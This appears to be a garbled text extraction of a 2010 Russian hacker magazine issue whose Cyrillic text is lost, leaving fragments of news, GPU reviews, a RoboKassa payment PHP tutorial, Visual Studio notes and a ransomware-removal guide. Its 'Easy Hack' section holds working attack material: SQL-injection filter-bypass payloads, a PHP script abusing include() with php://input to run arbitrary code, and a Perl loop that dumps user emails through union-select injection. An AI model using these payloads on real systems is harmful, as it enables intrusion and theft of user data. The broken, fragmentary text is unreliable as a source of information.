Professional Documents
Culture Documents
.
210
:
04 (135) 2010
DEP
HARDWARE-DEP
. 68
.NET REMOTING:
GRID-
CAPTCHA:
. 96
. 44
ACTIVEX
135
. 58
LINUX ?
. 90
http://group.xakep.ru
INTRO
: http://group.xakep.ru.
,
, ,
,
.
: -
6
, .
,
.
:
,
.
, : http://group.xakep.ru
, nikitozz
CONTENT
MegaNews
004
080
084
090
Ferrum
016
PC_ZONE
020
025
026
030
ACM ICPC: ,
GNU Screen tmux
Linux -
096
099
.NET
102
.NET Remoting:
grid-
.NET Framework
Shareware- Symbian
034
Easy-Hack
106
038
SYN/ACK
044
CAPTCHA:
110
050
Unserialize
115
054
120
IN DA FOCUS
058
122
064
128
068
DEP
074
X-Tools
ActiveX
Error-based SQL-Injection
hardware-DEP
C#
CFEngine 2
VPN
134
PSYCHO:
140
FAQ UNITED
076
143
144
WWW2
002
2010
:
-
FAQ
8.5
web-
X 04 /135/ 10
026
044
CAPTCHA:
068
DEP
hardware-DEP
128
VPN
/
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
>
(bergman@gameland.ru)
> xakep.ru
(xa@real.xakep.ru)
/ART
>-
(novikov.e@gameland.ru)
>
(svetlyh@gameland.ru)
/DVD
>
Step
(step@real.xakep.ru)
X 04 /135/ 10
> Unix-
Ant
>
/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>
>
>
>
>
>
>PR-
>
>
>
090
Linux
-
>
> Gameland TV
>
(strekneva@gameland.ru)
>
>
>
(ashomko@gameland.ru)
> -
>
(korenfeld@gameland.ru)
>
>
(andrey@gameland.ru)
>
(devald@gameland.ru)
>
(kosheleva@gameland.ru )
>
(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999
>
101000, ,
, / 652,
,
77-11802 14
2002 .
Lietuvas Rivas, .
100 000 .
.
. :
. ,
,
.
.
.
.
:
content@gameland.ru
, , 2009
003
MEGANEWS
MIFRILL
MARIA.NEFEDOVA@GLC.RU
MEGANEWS
- ,
, ,
. Cleankeys Touch Sensitive
Cleankeys Inc. , ,
, ,
. Cleankeys Touch Sensitive
, ,
!
, , ,
. , , ,
, $450
$400 , - .
,
. ,
. ,
.
GOOGLE WIKIMEDIA
FOUNDATION.
004
, -
,
. :
Virus Total (www.virustotal.
com) 20 10
. ,
.
, ,
, Virus Total.
,
10
10
14
,
. Virus Total
Hispasec Sistemas,
,
, ,
. ,
Virus Total ,
. ,
, , ,
,
.
X 04 /135/ 10
MEGANEWS
NOKIA.
?
AMAZON KINDLE
3
.
Maemo,
, Nokia
. , , Nokia
Intel ,
MeeGo,
, ,
.
,
: Moblin (Mobile Linux) Maemo,
. , MeeGo
Symbian,
, , ,
Nokia N900.
Linux
kernel.org ,
, .
Qt,
Nokia. , MeeGo
.
-
EKinoT.ru, IT eBay,
Twitter, Cisco Systems, Howcast, Edventure,
Social Gaming Network Mozilla,
.
, , Twitter
, , Catalys.
? ? ,
Dreamtorrent ( torrents.ru) -,
,
,
-.
,
,
.
: .ru . torrents.ru :
Cherokee (www.cherokee-project.
com) -, ,
,
HTTP-.
.
TWITTER : 1
, 17%.
006
X 04 /135/ 10
MEGANEWS
16- , 10
. , ?
Cyber ShockWave Bipartisan
Policy Center.
, CNN.
: -
,
, , -
,
. , , .
,
, ,
. .
, :
:).
,
, , ? ,
! : ? ,
!
Digital Access. 26 Digital Access ivi.
ru, 9.000
, , - , . .
?, , , ,
. , vs . ivi.ru :
uravo.tv, 30- .
Rambler , ,
. , , Digital Access
, 2011
20% .,
.
:
44- .
, ,
, eBay
, , 16 . ,
, . , ,
,
, . ,
eBay ,
- PayPal, , ,
, .
, . ,
- (, - )
, , : .
, :
, , ! eBay, ,
,
. .
008
X 04 /135/ 10
009
MEGANEWS
,
24 .
NVIDIA OPTIMUS
NVIDIA: ,
. NVIDIA Optimus ,
. NVIDIA
, . , NVIDIA
Optimus , , ,
ASUS UL50Vf, N61Jv, N71Jv, N82Jv U30Jc.
USB 3.0
USB 3.0 SATA 6 /
,
,
, . ,
,
?
GA-USB3.0 Gigabite.
PCI-Express x1
USB 3.0. GA-USB3.0
Molex,
.
$40.
010
X 04 /135/ 10
11
MEGANEWS
RADEON HD 5830
AMD 3D
ATI Radeon HD 5830,
,
Gigabyte, Sapphire,
XFX . ,
AMD . ATI Radeon HD
5830
5770 5850. ATI Radeon HD
5800 $240.
:
40- Cypress
1120 ,
56 1 GDDR5.
800 4000
. ATI Radeon HD 5830
DirectX 11, ATI Eyefinity, CrossFireX ATI Stream.
,
,
Radeon HD 5830 .
,
- ,
Globalscale GuruPlug Server. . 99
,
ARM: Marvell KirkWoord 1.2 , 512 DDR2 800 ,
802.11g, Bluetooth-,
Ethernet, 2 USB2.0, .
ARM- Debian
2.6.32, , , . Ethernet eSATA,
PLUS 30 . www.
globalscaletechnologies.com , ,
shipito.com,
. , ,
: 5
175 .
WIMAX FORUM,
WIMAX
620 .
, 2011
1 .
012
X 04 /135/ 10
PWN2OWN 2010
500000 !
:
3- .
X 04 /135/ 10
Google
Chrome $1337,
Pwn2Own, security- CanSecWest , .
4- ,
$100000. $40000,
(Microsoft Internet Explorer,
Mozilla Firefox, Google Chrome,
Apple Safari),
(XP Vista, Windows
7, Mac OS X Snow Leopard).
-
.
Apple iPhone
3GS, RIM Blackberry Bold 9700,
Nokia Symbian
S60 (, E62),
Motorola
Google Android.
.
,
Safari, Firefox
Internet Explorer 8,
(
Nils ),
. ?
013
13
MEGANEWS
, ,
pleaserobme.com ( ,
)
.
,
,
.
:
-
Twitter. ,
,
.
,
.
SCANSAFE , 2009
80%
PDF-.
GSM ,
4G
19 1710-1785 1805-1885
GSM .
, ,
. , , .
, .
, Delta, Air France, Lufthansa, Emirates .
15
LTE (Long Term
Evolution) . CDMA/UMTS
326,4 / , 172,8 / .
: WiMax vs. LTE,
, .
LTE 2009 .
-,
, .
: -, ,
,
. Symantec , ,
. Live PC Care
! , , ,
.
,
,
( $30100).
.
014
X 04 /135/ 10
Y2K , 10
- PlayStation 3
,
. Y2k,
?
, PS3. -
28 1
2010 PlayStation 3
( Slim- ), , (
) PlayStation
Network. PSN
: An error
has occurred. You have been signed out of PlayStation
Network (8001050F)
, Failed to install
trophies. Please exit your game.
1 2000 (
). Sony 2010 ,
. ,
29 1 .
, 24
, . ,
Zeus
. SpyEye
2009,
. Zeus,
.
-,
(C&C) .
, (1.0.7) Kill Zeus. SpyEye
Windows API
HttpSendRequestA,
Zeus . ,
SpyEye,
Zeus,
, Zeus C&C-
(,
) , , .
Zeus.
X 04 /135/ 10
015
Sapphire
Radeon HD 4650
FERRUM
Sapphire
Radeon HD
4650
Sapphire
Radeon HD 5750
Palit GeForce
GT 220 Sonic
Palit GeForce
GT 220 Sonic
apphire
on HD 5750
Palit GeForce
GT 220
Sapphire
Radeon HD
4670
Palit
GeForce GT
240 Sonic
.
.
, .
, , ? ,
.
, .
NVIDIA ATI,
, , low-end .
. ATI ,
NVIDIA CUDA PhysX, ,
. , ATI Stream,
CUDA. , , ATI ( ,
).
. NVIDIA 512 ,
ATI 256- . ,
GDDR5,
.
. NVIDIA 55 -, ATI 40 . , NVIDIA
40 .
, , . ,
. ,
, . 3DMark 2003,
Red Faction: Guerrilla, Resident Evil 5 Batman: Arkham Asylum.
, ,
16801050 , ,
016
:
PALIT GEFORCE GT 220
PALIT GEFORCE GT 220 SONIC
PALIT GEFORCE GT 240 SONIC
SAPPHIRE RADEON HD 4650
SAPPHIRE RADEON HD 4670 ULTIMATE
SAPPHIRE RADEON HD 5750
. Red Faction: Guerrilla 12801024 , .
,
,
, .
10
20
30
40
50
60
70
80
NVIDIA
X 04 /135/ 10
e
Palit GeForce
GT 220 Sonic
50
GPU,
,
Sapphire
Radeon HD 5750
PALIT GEFORCE
GT 220
1800 .
:
, : 40
, : 635
, : 800
: DDR2
, : 512
, : 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
DDR2 , ,
,
. .
, .
X 04 /135/ 10
100
Palit
GeForce GT
240 Sonic
Palit GeForce
GT 220 Sonic
Sapphire
Radeon HD 5750
PALIT GEFORCE
GT 220 SONIC
:
, : 40
, : 650
, : 900
: GDDR3
, : 512
, : 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
2000 .
Sonic .
,
Palit GeForce GT 220. -,
GDDR3,
, .
-, 10 650 900
, ( , 625
790 ). ,
, Palit
. , , 128- 1 -,
. VGA, HDMI DVI. ,
.
.
,
.
017
FERRUM
10
20
30
PALIT GEFORCE
GT 240 Sonic
SAPPHIRE RADEON
HD 4650
3500 .
NVIDIA
. , GDDR5,
. Sonic ( 95 ) ( 35 ), . ,
ATI Radeon Sapphire Radeon HD 5750.
,
,
.
, ,
, ,
- .
018
50
60
70
80
, : 40
, : 585
, : 945
: GDDR5
, : 1024
, : 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
40
, : 55
, : 600
, : 700
: GDDR3
, : 512
, : 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
1700 .
, ,
, , .
low-end,
. , , ,
Sapphire Radeon HD 4650 . HDMI, VGA
DVI, . .
, . , ,
Red Faction: Guerrilla.
. , ,
, , .
X 04 /135/ 10
3DMARK 2003,
10
15
20
25
30
Sapphire Radeon HD
5750
10000
20000
40000
50000
.
,
Sapphire Radeon HD
5750
.
SAPPHIRE RADEON
HD 4670 Ultimate
SAPPHIRE RADEON
HD 5750
, : 55
, : 750
, : 873
: GDDR3
, : 512
, : 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
30000
3100 .
, : 40
, : 700
, : 1150
: GDDR-5
, : 1024
, : 128
: PCI EXPRESS 2.0
DIRECTX: 11
5700 .
,
. - , , Sapphire
Radeon HD 4670 Ultimate, ,
.
, ,
. .
, ,
.
.
, ,
,
DirectX 11. , ,
,
, . ,
, . ,
.
, ( ). , -
, ,
.
, , ,
. ,
.
, ,
-
X 04 /135/ 10
. , ,
.
Sapphire Radeon
HD 5750,
, .
Palit GeForce GT 220 Sonic
..z
019
PC_ZONE
gurza brain@bidiko.ru
! , !
, . -,
? ?
? .
,
Webmoney. , ,
: ,
. ,
. , ,
,
.
,
.
, ,
. , , ,
, . :
,
.
,
? , .
( PDF- ),
, SMS.
Robokassa'
(www.robokassa.ru), -
020
. ,
,
- ,
, ,
- ,
.
,
.
(.,
Webmoney )? !
SMS? .
.
,
? , 9 . .
,
5% .
, .
,
! , , , PHP (+ curl)
jQuery,
ROBOKASSA
-,
PHP,
.
RoboKassa
API-.
,
. , :
PHP, Perl , ,
ASP Python .
HTTP- GET
POST URL https://merchant.
roboxchange.com.
. RoboKassa :
1. URL RoboKassa,
,
.
2. RoboKassa
,
.
. -, , RoboKassa,
X 04 /135/ 10
: bidiko.ru/test/xa/payments.php?item=1
, ,
.
3. RoboKassa
Result- .
, URL- Fail (
,
),
Success (
). URL- Result- Success, Fail RoboKassa
.
:
1.
URL-,
:
//
$inv_id = 0;
//
$shp_item = $item;
$shp_user = 'TestUser';
//
$crc = md5("$mrh_login:$out_
summ:$inv_id:$mrh_pass1:Shp_
item=$shp_item:Shp_user=$shp_
user");
// URL
$url = "https://merchant.
roboxchange.com/Index.
aspx?MrchLogin=$mrh_
login&OutSum=$out_summ&InvId=$inv_
id&Desc=$inv_desc&Shp_
item=$shp_item&Shp_user=$shp_
user&SignatureValue=$crc";
,
GET.
MrchLogin
X 04 /135/ 10
ajax- XML
RoboKassa. demo.
OutSum /
.
InvId .
,
.
,
(
RoboKassa),
.
Desc /,
, ,
URL.
Shp_item, Shp_
user :
Shp_item .
Shp_user
(, ).
,
(InvId),
RoboKassa
, ,
, /.
,
, SignatureValue
, - md5 "$mrh_
login:$out_summ:$inv_id:$mrh_pass1:Shp_
item=$shp_item:Shp_user=$shp_user".
,
$mrh_pass1 .
,
RoboKassa. ,
.
2. , ,
URL.
.
3.
, Result-, : -,
, -,
(
) ,
. ,
Bad sign, OK<% %>.
Result-.
//
$out_summ = $_REQUEST["OutSum"];
$inv_id = $_REQUEST["InvId"];
$shp_item = $_REQUEST["Shp_item"];
$shp_user = $_REQUEST["Shp_user"];
$crc = $_REQUEST[
"SignatureValue"];
$crc = strtoupper($crc);
//
$my_crc = strtoupper(md5("$out_
summ:$inv_id:$mrh_pass2:Shp_
item=$shp_item:Shp_user=$shp_
user"));
,
Result-, -.
, , ,
.
,
API- RoboKassa, -
021
PC_ZONE
.
.
, .
1. , (
, ,
..). ,
.
,
.
2.
.
,
,
.
.
,
,
ajax-,
( ,
) ,
.
curl:
,
.
payments.php.
$item
/ (
),
GET. payments.php
, ( )
022
. payments.php.
<?php
// item
// item
//
?>
<div id="xmlConsole">
//
</div>
<div id="pay_systems">
//"" /
<table class="pay_table">
//
</table>
</div>
payments.php (
)
,
switch.
,
,
, .
,
,
.
.
: ,
(,
),
.
, .
,
. Result-
"bad sign", ,
/ , , .
2
RoboKassa,
RoboKassa, ,
.
, ,
RoboKassa,
email. ,
-
! RoboKassa,
URL
.
pay_table.
: ,
:
: <b id="PayCode"></b>
<b>.</b>
PayCode .
, . PCR.
,
URL ( $url)
.
,
,
$url .
<a href="<?php echo
$url.'&IncCurrLabel=PCR'; ?>"></
a>
,
.
XML-
ROBOKASSA JQUERY
,
.
XML- RoboKassa.
XML- POST www.
roboxchange.com/xml/rate.asp.
:
X 04 /135/ 10
RK
<robox.rate.req>
<out_curr>OUTCURR</out_curr>
<merchant_login>LOGIN</
merchant_login>
<out_cnt>CNT</out_cnt>
</robox.rate.req>
OUTCURR
(
RoboKassa), LOGIN
, CNT
.
XML- RoboKassa
<robox.rate.resp>
<retval>nRetCode</retval>
<out_curr>sOutCurrLabel</out_curr>
<out_cnt>nOutCount</out_cnt>
<date>sDateODBC120</date>
<ratelist>
<rate>
<in_curr>sIncCurrLabel</in_curr>
<in_curr_name>
sIncCurrName
</in_curr_name>
<value>nValuet</value>
<ins_per_Xout>nInCount
</ins_per_Xout>
</rate>
</ratelist>
</robox.rate.resp>
: nRetCode , 0 , (
.
RoboKassa www.robokassa.ru/Doc/Ru/
Interface.aspx);
sOutCurrLabel
;
nOutCount
;
sDateODBC120 , ( "yyyy-mm-dd
hh:mm:ss", GMT);
<rate> , ,
X 04 /135/ 10
RoboKassa.
<rate>
in_curr ,
payments.php PayCode;
ins_per_Xout, ,
, ,
,
.
, XML- RoboKassa,
jQuery ( rk_xml_int.js).
ajax().
function getXML(url, cnt){
$.ajax({
url: url,
type: 'POST',
dataType: 'xml',
data: {cnt: cnt},
beforeSend: xmlStart,
success: xmlSuccess,
error: xmlError,
complete: xmlComplete
});
}
getXML() .
url
URL-,
. cnt
. ,
ajax(),
, xmlStart, xmlSuccess, xmlError,
xmlComplete, . . ,
url ,
.
PHP- XMLHTTPREQUEST
, script.js,
serv1.com,
serv2.com
XMLHttpRequest.
- rk_rate_proxy.php.
: rk_xml_
int.js XMLHttpRequest
XML- rk_rate_proxy.php (
),
curl XML RoboKassa,
. .
XML- curl
:
curl_setopt($ch, CURLOPT_URL,
$url);
curl_setopt($ch, CURLOPT_
RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT,
20);
curl_setopt($ch, CURLOPT_
POSTFIELDS, $request);
curl_setopt($ch, CURLOPT_
HTTPHEADER, array('Connection:
close'));
$url XML-
RoboKassa,
rk_rate_proxy.php. $request
, , XML-,
:
$request = '<robox.rate.req>';
$request .= '<out_curr>RUR</
out_curr>';
$request .= '<merchant_
login>demo</merchant_login>';
$request .= '<out_
cnt>'.$cnt.'</out_cnt>';
$request .= '</robox.rate.req>';
demo.
curl ,
. ,
023
PC_ZONE
xmlError(), , XML-
.
div-""
.
function xmlError(xhrInstance, message,
optional) {
$("#xmlConsole").html('<h2>
<font color="red">!</font>
</h2>');
$("#pay_systems").css(
'display', 'none');
}
XML-
xmlComplete(),
id=xmlConsole CSS- ajaxLoaderCSS,
xmlSuccess(),
parseXML() XML-.
parseXML()
jQuery JavaScript, .
DVD
dvd
$result = curl_exec($ch);
header('Content-type: text/xml');
echo $result;
, PHP- rk_rate_proxy.php .
.
Ajax- ,
XMLHttpRequest ,
. ,
ajax().
. xmlStart()
XML-.
CSS- div id=xmlConsole.
ajaxLoaderCSS
. - www.ajaxload.info,
. xmlStart()
.
function xmlStart(xhrInstance) {
$("#xmlConsole").
addClass("ajaxLoaderCSS");
}
024
function parseXML(xml){
// <rate>
$( xml ).find('rate').each(function(){
//
var curr =$(this).find('in_curr').text();
//
var val = $(this).find('ins_per_Xout').
text();
// -
$('#'+curr).html(val);
});
}
. XML-,
payments.php
<script type="text/javascript">
$(function() {
<?php
$tmp_out_summ = (int) $out_summ;
echo "getXML('rk_rate_proxy.php',
$tmp_out_summ);";
?>
});
</script>
getXML() ,
, DOM-
.
.
, . ? !
. , , ,
.
. . z
X 04 /135/ 10
S TEP T W I T T E R . C O M / S T E PA H
ACM ICPC: c , ,,
ACM-ICPC,
IBM, . ,
, : ,
. IBM :
, , . ?!
- ,
. ,
, .
, 30
. ACMICPC
.
: -
,
, .
(, ,
)
. ,
- IBM
, . -
: !
, , .
103
.
( , ), - .
20 .
, ,
ACM ICPC ,
.
,
, ,
. 11
. 18
. , ,
. ?
: . !
. , , ,
5 , 11
.
,
X 04 /135/ 10
ACM ICPC
, .
, , ,
,
IBM Smarter Planet ( )
, ,
,
,
,
. ,
,
,
.
. , , ,
,
.
C, C++ Java
.
,
,
.
,
. ,
,
,
, .
? , .
30
,
.
,
.
. , -
: , ?
? ,
three, two, one . ,
. ,
.
: ACM-ICPC
, .
: , ()
- ().
. , ,
. z
025
PC_ZONE
i-vizaik@microsoft.com
?
Visual Studio 2010
,
,
, Visual Studio
2010
12 2010.
:).
2009 . ,
,
. , ,
.
?
! ,
.
,
.
UI
(IDE Integrated
Development Environment) ,
, . :
026
,
.
.
Visual Studio 2010 :
.
:
,
.
,
.
, ,
Visual Studio
, 2010
. ,
Call Hierarchy ( )
(" ?", "
") ,
.
Find All References.
, X 04 /135/ 10
IDE
Visual Studio 2010
Call Hierarchy
, .
,
,
,
.
. Visual Studio 2010
, ,
.
, Navigate
To ( ,
CTRL+)
level-up
,
. ,
.
, ,
,
.
,
.
, .
. :
, (private). ,
X 04 /135/ 10
, , , . , SHIFT+ALT ( )
,
, ,
.
.
, ,
\\.
-
( code snippets) HTML
JavaScript.
,
, . Visual Studio 2010
.
.
. Watch:
,
.
,
,
,
. .
, , ,
.
,
.
IntelliTrace,
.
:
.
: , , , : ,
,
, !
:
,
, . , ,
,
,
,
, ,
, .
,
.
? :
. ,
.NET Framework 4,
Visual Studio 2010,
,
.
.
027
PC_ZONE
.NET FRAMEWORK 4
(deadlock).
:
, (),
.
Visual Studio 2010 : (Parallel Stacks)
(Parallel Tasks).
,
. ,
,
, :
.
: ,
.
,
,
.
, , ,
028
, ,
.
,
Visual Studio
2010 .
,
:
(Concurrency
Profiling),
,
.
, , .
Tier Interaction Profiler.
,
. -,
, . ,
ASP.NET -
Visual
Studio 2010 .NET
Framework 4,
. , ,
:
.
: BigInteger
Complex.
. ,
,
.
.NET Framework
Managed Extensibility Framework (MEF)
().
, .
,
MEF.
Visual Studio 2010.
, .NET Framework
4
.
System.Threading.
, WPF
:
DataGrid, Calendar DataPicker, ,
.
JavaScript Internet
Explorer 8.
,
,
, ,
.
, ,
,
-. ,
,
.
X 04 /135/ 10
RESHARPER?
INFO
Visual Studio
2010 JetBrains ReSharper (www.
jetbrains.com).
, , -.
, ReSharper, Visual Studio 2010, C# 4 VB10,
ASP.NET
ASP.NET MVC.
,
, LINQ
,
.
,
,
,
.
info
Microsoft
i-vizaik@
microsoft.com
IntelliTrace
,
.
:
,
.
C# VB ,
,
. -
Microsoft Excel,
Basic, .
Navigate To
EXPRESS- !
029
PC_ZONE
Step twiter.com/stepah
!
xakep 31337.
SMS, ,
, , Microsoft , , , , . .
Trojan.Winlock ,
, ,
.
(
Ransomware ransom,
), ,
SMS . , :
,
Microsoft
,
, ,
,
SMS.
(, , ,
030
),
, ,
, , .
,
,
,
SMS .
-
. ,
,
, . , , ,
, .
, , , .
TDL3,
. ,
( , ,
). ,
,
( ).
,
, , ,
, , .
,
, ?
, .
- ,
.
, .
1. , ,
.
,
,
.
X 04 /135/ 10
Dr.Web
wmic
(WMI Command-line),
,
:
wmic /NODE:<
> ( /
NODE:192.168.1.12) /USER:<
>
(, /USER:yastep)
,
. process. ,
.
:
delete:
process where name="< >" delete
, , .
2. Windows XP/2000,
<WIN-U>
,
.
- ,
,
.
3. ,
,
.
LiveCD.
,
,
ERD Commander.
,
: 5.0 Windows XP, 6.0 Windows
Vista, 6.5 Windows 7/Server 2008 R2.
X 04 /135/ 10
,
.
rescue-
LiveCD ,
: Dr.Web LiveCD
(www.freedrweb.com/livecd) Kaspersky
Rescue Disk (devbuilds.kaspersky-labs.com/
devbuilds/RescueDisk).
4. ,
,
. ,
, ,
,
, ,
, .
,
,
, , ,
.
,
. ,
,
,
, ,
SMS .
:
:
support.kaspersky.ru/viruses/deblocker;
Dr.Web:
http://www.drweb.com/unlocker/index;
Eset: www.esetnod32.ru/.support/winlock.
RansomHide (http://softget.
net/freeware/projects/RansomHide/ransomhide.
exe). SMS
,
. ,
- ,
.
, ,
. ,
(
,
, Hijackthis, Autoruns OSAM).
,
, .
HKLM\SOFTWARE\
Microsoft\Windows NT\CurrentVersion\Winlogon\
userinit, , Winlogon ,
. , Winlogon
Userinit.exe,
logon-,
,
Explorer.exe, ..
Windows. Userinit.exe
- ,
, Windows
Explorer, , ,
.
,
:
Userinit = %systemfolder%\
userinet.exe, [ ]
. ,
tmp,
Windows.
,
%systemfolder%\userinit.exe.
- shell ( , userinit),
explorer.exe
.
,
,
. ,
, .
NTFS? .
streams (technet.microsoft.
com/en-us/sysinternals/bb897440.aspx)
, : "streams.exe
-d -s c:\".
, -
031
PC_ZONE
Hijackthis
(
,
), ,
( ):
Kaspersky Virus Removal Tool (avptool.
virusinfo.info) , ,
. ,
.
,
.
Dr.Web CureIt! (www.freedrweb.com/cureit)
,
,
.
,
.
,
,
, ,
- :
AVZ (www.z-oleg.com/secur/avz) , ,
, .
-
AVZ
032
. AVZ
,
,
,
. ,
API-.
HijackThis (free.antivirus.com/hijackthis)
, AVZ, ,
, .
,
.
security-,
,
virusinfo.info.
, AVZ/HijackThis,
-, AVZ.
, AVZ
-> /
-
! virusinfo.info
!
virusinfo.info.
, , DLL-,
Internet Explorer , .
HTML,
,
,
.
LiveCD Dr.Web
80
ERD
Commander
,
,
, , ,
. ,
.
HKEY_CURRENT_
USER,
, HKEY_LOCAL_
MACHINE,
.
, . ,
DisableRegedit DisableRegistryTools:
X 04 /135/ 10
SMS-,
SMS ?
SMS .
, .
Google' sms , . ,
, , - , Google , .
, , .
, .
, : , , . .
, , , SMS , ,
( ),
. , , , , .
, . , . , : SMS
, SMS
.
.
exe-,
reg- :
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\exefile\shell]
[HKEY_CLASSES_ROOT\exefile\shell\open]
"EditFlags"=hex:00,00,00,00
[HKEY_CLASSES_ROOT\exefile\shell\open\
command]
@="\"%1\ %*"
[HKEY_CLASSES_ROOT\exefile\shell\runas]
[HKEY_CLASSES_ROOT\exefile\shell\runas\
command]
@="\"%1\ %*"
,
.
(,
regedit.exe) HKLM\SOFTWARE\
Microsoft\Windows NT\CurrentVersion\Image File Execution
Options.
,
,
Debugger.
, X 04 /135/ 10
.
:
REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\
Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\regedit.exe"
INFO
info
, ,
ProcessExplorer
HKEY_LOCAL_MACHINE\SOFTWARE\
,
Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths.
, , -
. .
,
exe -
DisableTaskMgr. reg-:
,
[HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\System]
,
"DisableTaskMgr"=dword:0
-
.
,
, . popup
SMS . ,
,
Internex Explore
Firefox'. ,
, . Internet Explorer
>
> ,
Firefox'
> .z
033
Spyder spyder@antichat.net
Cr@wler crawler@xakep.ru
Easy Hack
1
: SQL-INJECTION
:
, ,
, . , ,
,
.
%09
%0A
%0B
%0C
%0D
horizontal tab,
NL line feed,
vertical tab,
NP form feed,
carriage return,
. :
id=-1%0Aunion%0Aselect%0A1
C , , , :
<?php
if(isset($_GET['id']) && $_GET['id']!=''){
if(strstr($_GET['id'],"") {die "HACK ALERT"};
if(strstr($_GET['id'],"/**/") {die "HACK ALERT"};
if(strstr($_GET['id'],"+") {die "HACK ALERT"};
if(strstr($_GET['id'],"%20") {die "HACK ALERT"};
- $_GET[id]
: OPENVPN
:
OpenVPN
, . , ,
whoami root, : :) ?.
VPN-.
1. tun: modprobe tap && lsmod |
grep tap
2. , OpenVPN.
C lzo,
: locate lzo.so
3. , ,
. - ,
. (
, )
linux.
tar xzvf lzo.tgz
cd lzo
./configure
034
2. MySQL SQL- ,
:
select id/*!,title*/ from news
news id title. , :
id=-1/*!union*/select/*!version()*/
, .
, .
:
id=(-1)union(select(version()))
make
make install
4. , lzo , openvpn
lzo:
tar xzvf vpn.tgz
cd vbb
./configure
make
make install
5. .
. /etc/openvpn/,
openvpn easy-rsa sample-config-files
/etc/openvpn/easy-rsa :
./vars ( )
./clean-all (
keys )
./build-ca ( )
./build-key-server server ( X.509 )
X 04 /135/ 10
Common name
. client, server.
6. ,
./build-dh
7. , .
touch /etc/openvpn/server.conf
OpenVPN
port 443
proto tcp
dev tap
cipher DES-EDE3-CBC
reneg-sec 60
ca /etc/openvpn/easy-rsa/keys/ca.crt
cert /etc/openvpn/easy-rsa/keys/server.crt
key /etc/openvpn/easy-rsa/keys/server.key
dh /etc/openvpn/easy-rsa/keys/dh2048.pem
server 10.10.200.0 255.255.255.0
client-config-dir ccd
push "dhcp-option DNS 222.222.222.222"
push "dhcp-option DNS 22.22.222.222"
push "redirect-gateway"
keepalive 10 120
persist-key
persist-tun
comp-lzo
verb 0
8. ip- iptables:
: PHP-
:
2004 SecurityLab , php-
php://input. , .
, , :
<?php
if(isset($_GET['page'])) {include($_GET['page']);}
10. , .
, :). OpenVPN -
, ,
.
phpinfo().
2. PHP- .
<?php
if (isset($_GET['cmd']) && isset($_GET['host']) && isset($_
GET['script'])) {
$host = stripslashes(@$_GET['host']);
$script = stripslashes(@$_GET['script']);
$cmd = htmlspecialchars_decode(stripslashes(@$_
GET['cmd']));
$cmd = '<?php ' . $cmd . ' ?>';
$request = "POST /" . $script . "php://input" . " HTTP/1.1\
r\n";
$request .= "Accept-Language: en\r\n";
$request .= "Content-Type: application/x-www-formurlencoded\r\n";
035
:
SQL-
: , . ,
.
#!/usr/bin/perl
use LWP::Simple; # LWP::Simple http
open(FH,">dump.txt"); #
$lim=0; # $lim limit
while(1) { #
$url="http://www.example.com/profile.php?id=-1+union+sele
ct+concat('c0de',email,'ed0c')+from+users+limit+$lim,1";
# SQL-,
e-mail ,
$content = get("$url"); # get(),
if($content =~ m/c0de(.*)ed0c/) { # c -
:
:
, r57, c99 .
.
,
, , .
: ,
: ,
, ?
/tmp.
.
1. phpinfo() . session.save_handler. files , ,
session.save_path. Local Value,
( ), .htaccess.
036
3. :
http://localhost/input.php?host=www.example.
com&script=index.php?page=&cmd=phpinfo()
4. :).
email
print FH $1."\n"; #
$lim++; # $lim
} else { #
print 'Total dumped ' . $lim; # exit; #
}}
! ,
, .
dump-
, .
find . -user www -type d -ls , www
find . -user www -perm /222 -type d -ls ,
find . -group www -type d -ls ,
www
find . -perm -a+w -type d -ls ,
(, dr-xr-xrwx)
find . -perm -2
-type -d -ls, drwxrwxrwx ,
rwx
Master Value , ,
php.ini.
2. .htaccess, php_value
session.save_path.
3. .
, .
/tmp/
/php_sess/
/tmp/phpsess/
/tmp/php/
/tmp/php-sess/
/home/%username%/tmp/
X 04 /135/ 10
/var/phptemp/
/var/phptmp/
/var/phpsess/
/var/php-sess/
/var/lib/php/
/var/lib/php/session/
/var/lib/php3
/var/lib/php3/session/
/var/lib/php4/
/var/lib/php4/session/
/var/lib/php5/
/var/lib/php5/session/
/var/lib/php6/
: HTTPD.CONF
:
,
? , . ,
apache, init-, /etc/init.d/
bash- . :
pname=apache2
: ${sysconfdir:=/etc/$pname}
: ${apache_link:=/usr/sbin/httpd2}
: ${sysconfig_apache:=/etc/sysconfig/$pname}
:
WINLOCK,
SMS-.
:
, ( ).
, ,
, ( ). ,
(
, -,
..).
, , , ,
,
:).
(
, 300-600 ).
:
1. , (support.kaspersky.ru/viruses/
deblocker) . ,
, (c:\
windows\temp, Temp
Sandboxie Temporary Internet Files, c:\documents and settings\
:)
_\Local Settings).
,
System Volume Information,
,
.
2. LiveCD-,
(freedrweb.
X 04 /135/ 10
/var/lib/php6/
session/
/www/phpsession/
C:\Temp
C:\WINDOWS\Temp
C:\PHP\
sessiondata
phpinfo()
: ${pidfile:=/var/run/httpd2.pid}
: ${logdir:=/var/log/$pname}
httpd_conf=${APACHE_HTTPD_CONF:-$sysconfdir/httpd.conf}
/etc/apache2/httpd.conf.
( )
-
messages,
.
locate httpd.conf
phpinfo()
.
com/livecd), BIOS ,
LiveCD . Live- Windows CureIt
( ERD Explorer, . .).
3. ,
( freedrweb.
com/cureit).
4. , , , :
<Win+R>, gpedit.msc.
.
, Ok. . ,
,
Ctrl-Alt-Del.
regedit.exe, . HKEY_
